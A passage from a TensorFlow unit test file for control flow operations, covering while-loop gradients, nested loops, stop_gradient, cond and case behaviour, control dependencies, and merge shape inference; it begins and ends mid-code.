c1 = constant_op.constant(1.0, name="c1")
duration = constant_op.constant(0, name="t")
def cond(duration, _):
return duration < 1
def body(duration, _):
return duration + 1, c1
loop_vars = [duration, c0]
tensors = control_flow_ops.while_loop(
cond=cond, body=body, loop_vars=loop_vars)
cost = math_ops.reduce_sum(tensors[1])
grad = gradients_impl.gradients(cost, [c0])
self.assertAllClose(0.0, sess.run(grad[0]))
def testWhileGrad_SerialTwoLoops(self):
with self.cached_session():
i = constant_op.constant(0, name="i")
x = constant_op.constant(2.0, name="x")
c = lambda i, x: math_ops.less(i, 5)
def b(i, x):
x = math_ops.multiply(x, 2.0)
i = math_ops.add(i, 1)
return i, x
_, rx = control_flow_ops.while_loop(c, b, [i, x], parallel_iterations=1)
_, rx = control_flow_ops.while_loop(c, b, [i, rx], parallel_iterations=1)
r = gradients_impl.gradients([rx], x)
self.assertAllClose(1024.0, r[0].eval())
def testWhileGrad_ParallelTwoLoops(self):
with self.cached_session():
i = constant_op.constant(0, name="i")
x = constant_op.constant(2.0, name="x")
c = lambda i, x: math_ops.less(i, 5)
def b(i, x):
x = math_ops.multiply(x, 2.0)
i = math_ops.add(i, 1)
return i, x
_, r1 = control_flow_ops.while_loop(c, b, [i, x], parallel_iterations=1)
_, r2 = control_flow_ops.while_loop(c, b, [i, x], parallel_iterations=1)
rx = math_ops.add(r1, r2)
r = gradients_impl.gradients([rx], x)
self.assertAllClose(64.0, r[0].eval())
def testWhileGrad_OneOutputWithControlDependencyOnSecond(self):
with self.cached_session():
i = constant_op.constant(0, name="i")
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(1.0, name="y")
c = lambda i, *_: math_ops.less(i, 1, name="cond_less")
def b(i, xi, yi):
# return (i + 1, xi, xi + yi)
return (math_ops.add(i, 1, name="inc"), array_ops.identity(
xi, name="xi"), math_ops.add(xi, yi, name="xi_plus_yi"))
_, x_f, y_f = control_flow_ops.while_loop(c, b, [i, x, y])
with ops.control_dependencies([x_f]):
y_f_d = array_ops.identity(y_f, name="y_f_d")
self.assertAllClose(2.0, y_f_d.eval()) # y_f_d = 1.0 + 1.0
g = gradients_impl.gradients([y_f_d], [x])[0]
self.assertTrue(g is not None)
self.assertAllClose(1.0, g.eval()) # y_f_d = x + 1.0, dy_f_d/dx = 1.0
def _testNestedWhileGrad_Simple(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
v = constant_op.constant(1.0)
def inner_loop(s):
c = lambda x: math_ops.less(x, 4.0)
b = lambda x: math_ops.multiply(x, 2.0)
return control_flow_ops.while_loop(c, b, [s])
c = lambda x: math_ops.less(x, 2.0)
b = lambda x: math_ops.multiply(inner_loop(x), 2.0)
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
self.assertAllClose(8.0, r.eval())
def testNestedWhileGrad_Simple(self):
self._testNestedWhileGrad_Simple(use_gpu=False)
self._testNestedWhileGrad_Simple(use_gpu=True)
def testNestedWhileGrad_SerialInner(self):
with self.cached_session():
v = constant_op.constant(1.0)
def inner_loop1(s):
z = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 4)
b = lambda i, x: [math_ops.add(i, 1), math_ops.multiply(x, 2.0)]
return control_flow_ops.while_loop(c, b, [z, s])
def inner_loop2(s):
z = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 4)
b = lambda i, x: [math_ops.add(i, 1), math_ops.multiply(x, 2.0)]
return control_flow_ops.while_loop(c, b, [z, s])
c = lambda x: math_ops.less(x, 128.0)
b = lambda x: inner_loop2(inner_loop1(x)[1])[1]
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
self.assertAllClose(256.0, r.eval())
def testNestedWhileGrad_ParallelInner(self):
with self.cached_session():
v = constant_op.constant(1.0)
def inner_loop1(s):
z = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 4)
b = lambda i, x: [math_ops.add(i, 1), math_ops.multiply(x, 2.0)]
return control_flow_ops.while_loop(c, b, [z, s])
def inner_loop2(s):
z = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 4)
b = lambda i, x: [math_ops.add(i, 1), math_ops.multiply(x, 2.0)]
return control_flow_ops.while_loop(c, b, [z, s])
c = lambda x: math_ops.less(x, 128.0)
b = lambda x: math_ops.multiply(inner_loop1(x)[1], inner_loop2(x)[1])
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
self.assertAllClose(512.0, r.eval())
def testNestedWhileGrad_ParallelIterations(self):
# Make sure the stack pushes and pops of an inner loop are executed in
# the sequential order of the iterations of its outer loop.
with self.cached_session() as sess:
def inner_loop(t):
fn = lambda n: n + math_ops.square(var)
return functional_ops.map_fn(fn=fn, elems=t, parallel_iterations=10)
def outer_loop(inp):
return functional_ops.map_fn(
fn=inner_loop, elems=inp, parallel_iterations=10)
var = variables.Variable(constant_op.constant(3.0))
inp = constant_op.constant([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]])
res = outer_loop(inp)
optimizer = adam.AdamOptimizer(learning_rate=0.001)
train_op = optimizer.minimize(math_ops.reduce_mean(math_ops.square(res)))
sess.run(variables.global_variables_initializer())
sess.run(train_op)
self.assertAllClose(2.999, var.eval())
def _testWhileCondGrad_Simple(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
v = ops.convert_to_tensor(2.0, name="v")
n = ops.convert_to_tensor(100.0, name="n")
one = ops.convert_to_tensor(1.0, name="one")
c = lambda x: math_ops.less(x, n)
# pylint: disable=undefined-variable
# for OSS build
b = lambda x: control_flow_ops.cond(constant_op.constant(True),
lambda: math_ops.square(x),
lambda: math_ops.subtract(x, one))
# pylint: enable=undefined-variable
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
self.assertAllClose(1024.0, r.eval())
def testWhileCondGrad_Simple(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113294377 (unknown shape)")
self._testWhileCondGrad_Simple(use_gpu=False)
self._testWhileCondGrad_Simple(use_gpu=True)
def testWhileCondGrad_UnknownShape(self):
with self.cached_session() as sess:
v = array_ops.placeholder(dtypes.float32)
n = ops.convert_to_tensor(100.0, name="n")
one = ops.convert_to_tensor(1.0, name="one")
c = lambda x: math_ops.less(x, n)
# pylint: disable=undefined-variable
# for OSS build
b = lambda x: control_flow_ops.cond(constant_op.constant(True),
lambda: math_ops.square(x),
lambda: math_ops.subtract(x, one))
# pylint: enable=undefined-variable
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
r = sess.run(r, feed_dict={v: 2.0})
self.assertAllClose(1024.0, r)
def testWhileGrad_Concat(self):
with self.cached_session() as sess:
x = variable_scope.get_variable("x", initializer=[[1., 2.]])
i0 = constant_op.constant(0)
h0 = array_ops.zeros([0, 2])
def condition(i, _):
return i < 2
def body(i, h):
return i + 1, array_ops.concat([h, x], 0)
_, h = control_flow_ops.while_loop(
condition, body, [i0, h0],
[i0.get_shape(), tensor_shape.TensorShape([None, 2])])
s = math_ops.reduce_sum(h)
sess.run(variables.global_variables_initializer())
optimizer = gradient_descent.GradientDescentOptimizer(0.01)
op = optimizer.minimize(s)
sess.run(op)
self.assertAllClose([[0.98000002, 1.98000002]], sess.run(x))
def testWhileWithRefsWithGradients_1(self):
with self.cached_session() as sess:
x = variables.Variable(0.)._ref() # pylint: disable=protected-access
i = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 10)
self.assertEqual(x.dtype, dtypes.float32_ref)
def body(i, x):
self.assertEqual(x.dtype, dtypes.float32_ref)
return [i + 1, gen_array_ops.ref_identity(x)]
r = control_flow_ops.while_loop(c, body, [i, x], parallel_iterations=5)
grad_ys = [variables.Variable(73)._ref()] # pylint: disable=protected-access
grad = gradients_impl.gradients([r[1]], [x], grad_ys=grad_ys)
variables.global_variables_initializer().run()
self.assertEqual(r[0].dtype, dtypes.int32)
self.assertEqual(r[1].dtype, dtypes.float32_ref)
value_i, value_x, value_x_grad = sess.run(r + grad)
self.assertEqual(10, value_i)
self.assertEqual(0, value_x)
self.assertEqual(73, value_x_grad)
def testWhileGrad_IndexedSlices(self):
with self.cached_session():
values = constant_op.constant([2.0, 4.0], name="values")
indices = constant_op.constant([0, 3], name="indices")
shape = constant_op.constant([10], name="dense_shape")
i = constant_op.constant(0)
x = ops.IndexedSlices(values, indices, dense_shape=shape)
def c(i, _):
return i < 10
def b(i, x):
return [
i + 1,
ops.IndexedSlices(x.values * 2.0, x.indices, x.dense_shape)
]
_, r = control_flow_ops.while_loop(c, b, [i, x])
r = gradients_impl.gradients(r.values, values)[0]
self.assertAllClose(np.array([1024.0, 1024.0]), r.eval())
def testWhileGrad_SparseTensor(self):
with self.cached_session():
values = constant_op.constant([2.0, 4.0], name="values")
indices = constant_op.constant(
[[0], [3]], dtype=dtypes.int64, name="indices")
shape = constant_op.constant([10], dtype=dtypes.int64, name="dense_shape")
i = constant_op.constant(0)
x = sparse_tensor.SparseTensor(indices, values, dense_shape=shape)
def c(i, _):
return i < 10
def b(i, x):
return [
i + 1,
sparse_tensor.SparseTensor(x.indices, x.values * 2.0, x.dense_shape)
]
_, r = control_flow_ops.while_loop(c, b, [i, x])
r = gradients_impl.gradients(r.values, values)[0]
self.assertAllClose(np.array([1024.0, 1024.0]), r.eval())
def testCallGradInLoop(self):
with self.cached_session() as sess:
i0 = constant_op.constant(0)
params = constant_op.constant(5.0)
params_1 = math_ops.square(params)
def c(i, _):
return i < 10
def b(i, x):
data = constant_op.constant([1.0, 2.0, 3.0])
data = math_ops.multiply(data, params_1)
x1 = x + gradients_impl.gradients(data, params)[0]
return i + 1, x1
output_grad = control_flow_ops.while_loop(
c, b, [i0, constant_op.constant(0.0)])
self.assertAllClose(600.0, sess.run(output_grad)[1])
def testWhileAndTensorArray(self):
with self.cached_session() as sess:
param = constant_op.constant(2.0)
n0 = constant_op.constant(0)
y0 = constant_op.constant([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], name="elems")
def c(i, _):
return i < 10
def b(i, y):
return [
i + 1,
functional_ops.map_fn(lambda x: math_ops.multiply(x, param), y)
]
r = control_flow_ops.while_loop(c, b, [n0, y0], parallel_iterations=1)
r = gradients_impl.gradients(r, param)[0]
self.assertAllClose(107520.0, sess.run(r))
def testWhileGrad_StopGrad(self):
with self.cached_session():
x = constant_op.constant(3.0, name="x")
y = constant_op.constant(2.0, name="y")
c = lambda x, y: math_ops.less(x, 100.0)
def b(x, y):
y1 = math_ops.square(y)
x1 = math_ops.add(math_ops.square(x), y1)
return x1, y1
rx, ry = control_flow_ops.while_loop(c, b, [x, y])
r = gradients_impl.gradients(rx, y)[0]
self.assertEqual(136.0, r.eval())
r = gradients_impl.gradients(ry, y)[0]
self.assertEqual(32.0, r.eval())
r = gradients_impl.gradients(array_ops.stop_gradient(rx), y)[0]
self.assertEqual(r, None)
r = gradients_impl.gradients(array_ops.stop_gradient(ry), y)[0]
self.assertEqual(r, None)
r = gradients_impl.gradients(
array_ops.stop_gradient(math_ops.square(rx)), y)[0]
self.assertEqual(r, None)
r = gradients_impl.gradients(
array_ops.stop_gradient(math_ops.add(rx, ry)), x)[0]
self.assertEqual(r, None)
r = gradients_impl.gradients(
array_ops.stop_gradient(math_ops.add(rx, ry)), y)[0]
self.assertEqual(r, None)
r = gradients_impl.gradients(math_ops.add(rx, ry), y)[0]
self.assertEqual(168.0, r.eval())
r = gradients_impl.gradients(
math_ops.add(rx, array_ops.stop_gradient(ry)), y)[0]
self.assertEqual(136.0, r.eval())
r = gradients_impl.gradients(
math_ops.add(array_ops.stop_gradient(rx), ry), y)[0]
self.assertEqual(32.0, r.eval())
def testWhileGrad_StopGradInside(self):
with self.cached_session():
x = constant_op.constant(3.0, name="x")
y = constant_op.constant(2.0, name="y")
c = lambda x, y: math_ops.less(x, 100.0)
def b(x, y):
y1 = array_ops.stop_gradient(math_ops.square(y))
x1 = math_ops.add(math_ops.square(x), y1)
return x1, y1
rx, _ = control_flow_ops.while_loop(c, b, [x, y])
r = gradients_impl.gradients(rx, y)[0]
self.assertAllClose(0.0, r.eval())
r = gradients_impl.gradients(rx, x)[0]
self.assertAllClose(156.0, r.eval())
def testWhileGrad_StopGradInsideNoShape(self):
with self.cached_session() as sess:
x = array_ops.placeholder(dtypes.float32)
y = array_ops.placeholder(dtypes.float32)
c = lambda x, y: math_ops.less(math_ops.reduce_sum(x), 100.0)
def b(x, y):
y1 = array_ops.stop_gradient(math_ops.square(y, name="stopped"))
x1 = math_ops.add(math_ops.square(x), y1)
return x1, y1
rx, _ = control_flow_ops.while_loop(c, b, [x, y])
r = gradients_impl.gradients(rx, y)[0]
feed_dict = {x: [3.0, 4.0], y: [2.0, 3.0]}
self.assertAllClose([0.0, 0.0], sess.run(r, feed_dict=feed_dict))
r = gradients_impl.gradients(rx, x)[0]
self.assertAllClose([156.0, 400.0], sess.run(r, feed_dict=feed_dict))
name = "gradients/while/stopped_grad"
all_ops = x.graph.get_operations()
self.assertFalse(any([name in op.name for op in all_ops]))
def testWhileGradGradFail(self):
theta = variables.Variable(initial_value=1.)
def fn(prev, x):
return prev + x * theta
result = functional_ops.scan(fn, np.array([1., 2., 3.], dtype=np.float32))
grad_theta = gradients_impl.gradients(result, theta)
with self.assertRaisesRegexp(TypeError, "Second-order gradient"):
gradients_impl.gradients(grad_theta, theta)
grad_theta_stopped = array_ops.stop_gradient(grad_theta)
gradients_impl.gradients(grad_theta_stopped, theta)
def testStopGradOnWhileGrad(self):
with self.cached_session():
x = constant_op.constant(2.0, name="x")
y = constant_op.constant(2.0, name="y")
c = lambda x: math_ops.less(x, 100.0)
b = lambda x: math_ops.multiply(x, y)
rx = control_flow_ops.while_loop(c, b, [x])
rg = gradients_impl.gradients(rx, y)[0]
rg = array_ops.stop_gradient(rg)
r = math_ops.add(math_ops.square(y), rx)
r = math_ops.add(r, rg)
r = gradients_impl.gradients(r, y)[0]
self.assertEqual(388.0, r.eval())
def testWhileGradientWithNontrainablePath1(self):
q = variables.Variable([7., 8.])
def cond(_, y):
del y
return False
def body(x, _):
return x, math_ops.cast(x, dtypes.float32) + math_ops.reduce_sum(q)
_, y = control_flow_ops.while_loop(cond, body, (math_ops.argmin(q), 0.))
dy_dq, = gradients_impl.gradients(y, q)
self.assertIsNotNone(dy_dq)
with self.cached_session() as sess:
sess.run(q.initializer)
self.assertAllClose([0., 0.], sess.run(dy_dq))
def testWhileGradientWithNontrainablePath2(self):
q = variables.Variable([7., 8.])
def cond(_, y):
return math_ops.equal(y, 0.)
def body(x, _):
zero = constant_op.constant(0, dtype=dtypes.int64)
return zero, math_ops.cast(x, dtypes.float32) + math_ops.reduce_sum(q)
_, y = control_flow_ops.while_loop(cond, body, (math_ops.argmin(q), 0.))
dy_dq, = gradients_impl.gradients(y, q)
self.assertIsNotNone(dy_dq)
with self.cached_session() as sess:
sess.run(q.initializer)
self.assertAllClose([1., 1.], sess.run(dy_dq))
def testIssue16504(self):
c = constant_op.constant(np.arange(100), dtype=dtypes.float32)
w = variables.Variable(
initial_value=np.ones(100), dtype=dtypes.float32) / 100
k = variables.Variable(0, dtype=dtypes.int32)
chg_w = constant_op.constant(np.inf, dtype=dtypes.float32)
def cond(k, _, chg_w):
return math_ops.logical_and(k < 10, chg_w > 1e-3)
def body(k, w, chg_w):
grad, = gradients_impl.gradients(-math_ops.reduce_sum(w * c), w)
w_n = w * math_ops.exp(-0.1 * grad)
w_n /= math_ops.reduce_sum(w_n)
chg_w = (
math_ops.reduce_sum(math_ops.abs(w_n - w)) / math_ops.reduce_sum(
math_ops.abs(w)))
return k + 1, w_n, chg_w
_, w, _ = control_flow_ops.while_loop(cond, body, [k, w, chg_w])
grad, = gradients_impl.gradients(w, c)
self.assertIsNotNone(grad)
def testStopGradMultiFlows(self):
with self.cached_session():
def body(i, y, r):
x = variable_scope.get_variable(
"x",
shape=(),
dtype=dtypes.float32,
initializer=init_ops.ones_initializer())
y *= x
return [i + 1, y, r + math_ops.reduce_sum(y)]
i0 = constant_op.constant(0)
y0 = array_ops.ones(5)
r0 = constant_op.constant(0.0)
cond = lambda i, y, r: i < 1
_, _, r = control_flow_ops.while_loop(
cond, body, [i0, y0, r0], back_prop=True)
vars_ = variables.global_variables()
grads = linalg_ops.norm(gradients_impl.gradients(r, vars_)[0])
z = math_ops.add(r, array_ops.stop_gradient(math_ops.reduce_sum(grads)))
result = gradients_impl.gradients(z, vars_)[0]
variables.global_variables_initializer().run()
self.assertEqual(5.0, result.eval())
def testOneValueCond(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/111124878 (don't return tuple)")
with self.cached_session():
c = array_ops.placeholder(dtypes.int32, shape=[])
one = ops.convert_to_tensor(1, name="one")
two = ops.convert_to_tensor(2, name="two")
p = math_ops.greater_equal(c, 1)
i = control_flow_ops.cond(p, lambda: one, lambda: two)
self.assertTrue(isinstance(i, ops.Tensor))
# True case: c = 2 is >= 1
self.assertEqual([1], i.eval(feed_dict={c: 2}))
# False case: c = 0 is not >= 1
self.assertEqual([2], i.eval(feed_dict={c: 0}))
def testExampleCond(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/111124878 (don't return tuple)")
with self.cached_session():
x = ops.convert_to_tensor([-2.0, 2.0], name="x")
d = array_ops.placeholder(dtypes.int32, shape=[])
def l2():
return math_ops.sqrt(math_ops.reduce_sum(math_ops.square(x)))
def l1():
return math_ops.reduce_sum(math_ops.abs(x))
i = control_flow_ops.cond(math_ops.equal(d, 2), l2, l1)
self.assertAllClose(4.0, i.eval(feed_dict={d: 1}))
self.assertAllClose(2.0 * math.sqrt(2), i.eval(feed_dict={d: 2}))
def testCase(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/112477618 (Operation returned from cond)")
with self.cached_session():
x = constant_op.constant(1)
y = constant_op.constant(2)
z = constant_op.constant(3)
f1 = lambda: constant_op.constant(17)
f2 = lambda: constant_op.constant(23)
f3 = lambda: constant_op.constant(-1)
r1 = control_flow_ops.case(
{
x < y: f1,
x > z: f2
}, default=f3, exclusive=True)
self.assertAllEqual(r1.eval(), 17)
r2 = control_flow_ops.case([(y > z, f1), (y > x, f2)], default=f3)
self.assertAllEqual(r2.eval(), 23)
# Duplicate events can happen, first one is selected
r3 = control_flow_ops.case([(x < y, f1), (x < y, f2)], default=f3)
self.assertAllEqual(r3.eval(), 17)
# Duplicate events cause an error if exclusive = True
r4 = control_flow_ops.case(
[(x < y, f1), (x < y, f2)], default=f3, exclusive=True)
with self.assertRaisesOpError("Input error:"):
r4.eval()
# Check that the default is called if none of the others are
r5 = control_flow_ops.case({x > y: f1}, default=f3)
self.assertAllEqual(r5.eval(), -1)
ran_once = [False, False, False]
def break_run_twice(ix):
def _break():
ran_once[ix] = True
return constant_op.constant(ix)
return _break
# Should not fail - each conditional gets called exactly once
# except default. Default gets called twice: once to create an
# empty output and once for the actual cond switch.
r6 = control_flow_ops.case(
[(x < y, break_run_twice(0)), (x > y, break_run_twice(1))],
default=lambda: constant_op.constant(2))
self.assertAllEqual(r6.eval(), 0)
def testCaseSideEffects(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/112477618 (Operation returned from cond)")
with self.cached_session() as sess:
v0 = variables.Variable(-1)
v1 = variables.Variable(-1)
v2 = variables.Variable(-1)
a = lambda: control_flow_ops.with_dependencies([state_ops.assign(v0, 0)], 0)
b = lambda: control_flow_ops.with_dependencies([state_ops.assign(v1, 1)], 1)
c = lambda: control_flow_ops.with_dependencies([state_ops.assign(v2, 2)], 2)
x = constant_op.constant(1)
y = constant_op.constant(2)
r0 = control_flow_ops.case(
((x < y, a), (x > y, b)), default=c, exclusive=True)
r1 = control_flow_ops.case(
((x > y, a), (x < y, b)), default=c, exclusive=True)
r2 = control_flow_ops.case(
((x > y, a), (x > y, b)), default=c, exclusive=True)
variables.global_variables_initializer().run()
self.assertAllEqual(sess.run([v0, v1, v2]), [-1] * 3)
self.assertEqual(2, r2.eval())
self.assertAllEqual(sess.run([v0, v1, v2]), [-1, -1, 2])
variables.global_variables_initializer().run()
self.assertAllEqual(sess.run([v0, v1, v2]), [-1] * 3)
self.assertEqual(1, r1.eval())
self.assertAllEqual(sess.run([v0, v1, v2]), [-1, 1, -1])
variables.global_variables_initializer().run()
self.assertAllEqual(sess.run([v0, v1, v2]), [-1] * 3)
self.assertEqual(0, r0.eval())
self.assertAllEqual(sess.run([v0, v1, v2]), [0, -1, -1])
def testOneOpCond(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113324949 (ref vars)")
with self.cached_session():
v = variables.Variable(0)
c = ops.convert_to_tensor(0)
one = ops.convert_to_tensor(1)
two = ops.convert_to_tensor(2)
p = math_ops.greater_equal(c, 1)
def a():
return state_ops.assign(v, one)
def b():
return state_ops.assign(v, two)
i = control_flow_ops.cond(p, a, b)
self.assertTrue(isinstance(i, ops.Tensor))
variables.global_variables_initializer().run()
self.assertEqual(0, v.eval())
# True case: c = 2 is >= 1, v is set to 1.
self.assertEqual(1, i.eval(feed_dict={c.name: 2}))
self.assertEqual(1, v.eval())
# False case: c = 0 is not >= 1, v is set to 2.
self.assertEqual(2, i.eval(feed_dict={c.name: 0}))
self.assertEqual(2, v.eval())
def testWithOpsDependencies(self):
with self.cached_session() as sess:
v = variables.Variable(0.0)
c = constant_op.constant(10)
# Fetching v directly will result in an uninitialized error
with self.assertRaisesOpError("Attempting to use uninitialized value"):
sess.run([c, v])
# Use a control dependency to ensure init_variable is run
# while asking for c
real_v = control_flow_ops.with_dependencies(
name="real_tensor",
output_tensor=v._ref(), # pylint: disable=protected-access
dependencies=[v.initializer])
c_val, real_v_val = sess.run([c, real_v])
# Ensure the result of 'real_c' is the same as 'c'
self.assertAllEqual(10, c_val)
# Ensure that 'v' is initialized
self.assertAllClose(0.0, real_v_val)
def testWithTensorDependencies(self):
with self.cached_session():
v = variables.Variable(0.0)
c1 = constant_op.constant(10)
c2 = constant_op.constant(20)
# c1_with_init_v depends on the init op for v
c1_with_init_v = control_flow_ops.with_dependencies(
name="c1_with_init_v", output_tensor=c1, dependencies=[v.initializer])
# c2_with_c1 depends on the value of c1_with_init_v
c2_with_c1_dep = control_flow_ops.with_dependencies(
name="c2_with_c1_dep",
output_tensor=c2,
dependencies=[c1_with_init_v])
# Fetching v directly will result in an uninitialized error
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v.eval()
# Get the value of 'c2_with_c1_dep', which should cause 'v'
# to be initialized.
self.assertAllEqual(20, c2_with_c1_dep.eval())
# Ensure that 'v' is initialized
self.assertAllClose(0.0, v.eval())
def testWithIndexedSlicesDependencies(self):
with self.cached_session():
v = variables.Variable(
np.array([[0.0, 1.0], [10.0, 11.0], [20.0, 21.0]]).astype(np.float32))
v_at_1 = ops.IndexedSlices(v, constant_op.constant([1]))
gather_v_at_1 = array_ops.gather(v_at_1.values, v_at_1.indices)
v_at_1_after_init = control_flow_ops.with_dependencies([v.initializer],
v_at_1)
gather_v_at_1_after_init = array_ops.gather(v_at_1_after_init.values,
v_at_1_after_init.indices)
# Fetching gather_v_at_1 will result in an uninitialized error
with self.assertRaisesOpError("Attempting to use uninitialized value"):
gather_v_at_1.eval()
# Getting gather_v_at_1_after_init will work, and initialize v.
self.assertAllEqual([[10.0, 11.0]], gather_v_at_1_after_init.eval())
# Double check that 'v' is initialized
self.assertAllClose([[0.0, 1.0], [10.0, 11.0], [20.0, 21.0]], v.eval())
def testDependenciesDevice(self):
with ops.Graph().as_default():
# device set on tensor => same device on dep.
with ops.device("/job:ps"):
vd = variables.Variable([0.0])
with_vd_dep = control_flow_ops.with_dependencies([vd.initializer], vd)
self.assertTrue("/job:ps" in with_vd_dep.device)
# No device set on tensor => no device on dep.
vnod = variables.Variable([0.0])
with_vnod_dep = control_flow_ops.with_dependencies([vnod.initializer],
vnod)
self.assertDeviceEqual(None, with_vnod_dep.device)
# device set on tensor, default device on graph => default device on dep.
vdef = variables.Variable([0.0], name="vdef")
with ops.device("/job:worker/device:GPU:1"):
with_vdef_dep = control_flow_ops.with_dependencies([vdef.initializer],
vdef)
# The device is empty, but the colocation constraint is set.
self.assertDeviceEqual("", with_vdef_dep.device)
self.assertEqual([b"loc:@vdef"], with_vdef_dep.op.colocation_groups())
def testGroup(self):
with self.cached_session() as sess:
v1 = variables.Variable([0.0])
v2 = variables.Variable([1.0])
# Group init1 and init2 and run.
init = control_flow_ops.group(v1.initializer, v2.initializer)
# Fetching v1 directly will result in an uninitialized error
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v1.eval()
# Runs "init" before fetching v1 and v2.
init.run()
v1_val, v2_val = sess.run([v1, v2])
# Ensure that v1 and v2 are initialized
self.assertAllClose([0.0], v1_val)
self.assertAllClose([1.0], v2_val)
def testGroupEmpty(self):
op = control_flow_ops.group()
self.assertEqual(op.type, "NoOp")
self.assertEqual(op.control_inputs, [])
def testMergeShapes(self):
# All inputs unknown.
p1 = array_ops.placeholder(dtypes.float32)
p2 = array_ops.placeholder(dtypes.float32)
p3 = array_ops.placeholder(dtypes.float32)
m, index = control_flow_ops.merge([p1, p2, p3])
self.assertIs(None, m.get_shape().ndims)
self.assertEqual([], index.get_shape())
# All inputs known with different ranks.
p1 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[1, 2, 3])
m, index = control_flow_ops.merge([p1, p2])
self.assertIs(None, m.get_shape().ndims)
self.assertEqual([], index.get_shape())
# All inputs known with some dimensions different.
p1 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[2, 1])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, None], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
p1 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[None, 2])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, 2], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
p1 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[2, 2])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, 2], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
# All inputs known with same dimensions.
p1 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([1, 2], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
p1 = array_ops.placeholder(dtypes.float32, shape=[None, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[None, 2])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, 2], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
p1 = array_ops.placeholder(dtypes.float32, shape=[None, None])
p2 = array_ops.placeholder(dtypes.float32, shape=[None, None])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, None], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
def testRefSelect(self):
index = array_ops.placeholder(dtypes.int32)
# All inputs unknown.
p1 = array_ops.placeholder(dtypes.float32)
p2 = array_ops.placeholder(dtypes.float32)
p3 = array_ops.placeholder(dtypes.float32)
v1 = variables.Variable(p1, validate_shape=False)
v2 = variables.Variable(p2, validate_shape=False)
v3 = variables.Variable(p3, validate_shape=False)
self.assertIs(None, v1.get_shape().ndims)
s = control_flow_ops.ref_select(index, [v1, v2, v3])
self.assertIs(None, s.get_shape().ndims)
# All inputs known but different.
v1 = variables.Variable([[1, 2]])
v2 = variables.Variable([[2], [1]])
s = control_flow_ops.ref_select(index, [v1, v2])
self.assertIs(None, s.get_shape().ndims)
# All inputs known and same.
v1 = variables.Variable([[1, 2]])
v2 = variables.Variable([[1, 2]])
s = control_flow_ops.ref_select(index, [v1, v2])
self.assertEqual([1, 2], s.get_shape())
# Possibly the same but not guaranteed.
v1 = variables.Variable([[1., 2.]])
p2 = array_ops.placeholder(dtypes.float32, shape=[None, 2])
v2 = variables.Variable(p2, validate_shape=False)
s = control_flow_ops.ref_select(index, [v1, v2])
self.assertEqual(None, s.get_shape())
def testRunLoopTensor(self):
with self.cached_session() as sess:
tensor_list = []
def condition(t):
return t < constant_op.constant(5)
def body(_):
tensor_list.append(constant_op.constant(5))
return constant_op.constant(10)
result = control_flow_ops.while_loop(condition, body,
[constant_op.constant(4)])
self.assertEqual(10, sess.run(result))
# Ensure that we cannot run a tensor that escapes the loop body
# accidentally.
with self.assertRaises(ValueError):
sess.run(tensor_list[0])
def testWhilePyFuncBasic(self):
def func(x):
return np.square(x)
with self.cached_session():
r = control_flow_ops.while_loop(
lambda i, v: i < 4,
lambda i, v: [i + 1, script_ops.py_func(func, [v], [dtypes.float32])[0]],
[constant_op.constant(0), constant_op.constant(2.0, dtypes.float32)],
[tensor_shape.unknown_shape(), tensor_shape.unknown_shape()])
self.assertEqual(r[1].eval(), 65536.0)
def testWhileFuncBasic(self):
@function.Defun(dtypes.float32)
def func(x):
return math_ops.square(math_ops.square(x))
with self.cached_session():
x = constant_op.constant(2.0, dtypes.float32)
r = control_flow_ops.while_loop(
lambda i, v: i < 2, lambda i, v: [i + 1, func(v)],
[constant_op.constant(0), x],
[tensor_shape.unknown_shape(),
tensor_shape.unknown_shape()])
self.assertEqual(r[1].eval(), 65536.0)
r = gradients_impl.gradients(r, x)[0]
self.assertEqual(r.eval(), 524288.0)
self.assertEqual(
len([op for op in x.graph.get_operations() if op.type == "StackV2"]),
1)
class ControlFlowContextCheckTest(test.TestCase):
def _getWhileTensor(self):
"""Creates and returns a tensor from a while context."""
tensor = []
def body(i):
if not tensor:
